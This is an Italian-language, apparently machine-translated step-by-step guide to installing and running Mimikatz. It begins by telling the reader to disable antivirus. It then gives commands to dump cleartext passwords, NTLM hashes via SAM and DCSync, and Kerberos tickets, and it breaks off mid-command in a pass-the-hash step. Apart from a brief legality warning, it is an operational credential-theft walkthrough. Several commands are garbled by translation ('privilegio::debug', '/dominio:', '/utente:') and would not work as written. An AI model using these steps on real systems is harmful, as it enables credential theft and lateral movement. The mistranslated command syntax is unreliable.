Introduzione

Mimikatz è un potente strumento di post-exploitation progettato per estrarre dalla memoria password in chiaro, hash, codici PIN e ticket Kerberos. È ampiamente utilizzato dai penetration tester e dai professionisti della sicurezza per valutare le vulnerabilità dei sistemi. Questa guida fornisce un approccio passo dopo passo all’installazione e all’utilizzo di Mimikatz per i test etici di sicurezza.

Attenzione: L’uso non autorizzato di Mimikatz è illegale. Assicurarsi di avere l’autorizzazione prima di utilizzarlo in qualsiasi ambiente.

Prerequisiti

Prima di installare Mimikatz, assicurarsi di disporre di quanto segue:

  • Un computer Windows( versioniWindows 7 , 10, 11 o Server)
  • Privilegi amministrativi
  • Windows Defender e qualsiasi altro software antivirus disattivati (Mimikatz viene spesso segnalato come malware)

Scaricare Mimikatz

Mimikatz è uno strumento open-source disponibile su GitHub. Per scaricarlo:

  1. Aprire un browser web e accedere a https://github.com/gentilkiwi/mimikatz.
  2. Fare clic su Codice > Scarica ZIP.
  3. Estrarre il file ZIP in una cartella a scelta.

In alternativa, è possibile clonare il repository usando Git:

 git clone https://github.com/gentilkiwi/mimikatz.git

Esecuzione di Mimikatz

Poiché Mimikatz richiede privilegi amministrativi, seguite questi passaggi per eseguirlo:

  1. Aprire il prompt dei comandi o PowerShell come amministratore.
  2. Passare alla cartella in cui è stato estratto Mimikatz:
    cd percorso\to\mimikatz\x64
  3. Eseguire Mimikatz:
    mimikatz.exe
  4. Dovrebbe apparire un’interfaccia a riga di comando con il prompt # di mimikatz.

Comandi di base di Mimikatz

1. Controllare i privilegi del sistema

Prima di estrarre le credenziali, verificare di avere privilegi sufficienti:

privilegio::debug

In caso di esito positivo, si dovrebbe vedere: Privilegio '20' OK

2. Estrarre le password dalla memoria

Per estrarre le password in chiaro dalla memoria, utilizzare:

sekurlsa::logonpasswords

Questo visualizzerà nome utente, dominio e password in chiaro, se disponibili.

3. Scaricare gli hash NTLM

Gli hash NTLM possono essere utilizzati per attacchi pass-the-hash. Per estrarli, eseguire:

lsadump::sam

Oppure, per i sistemi remoti:

lsadump::dcsync /dominio:dominio di destinazione.com /utente:Amministratore

4. Estrazione del biglietto Kerberos

Per recuperare i ticket Kerberos dal sistema:

sekurlsa::tickets /export

Esporta i file .kirbi, che possono essere utilizzati negli attacchi pass-the-ticket.

5. Attacco Pass-the-Hash

Per autenticarsi con un hash NTLM invece che con una password:

sekurlsa::pth /utente:Amministratore /dominio:example.com /ntlm: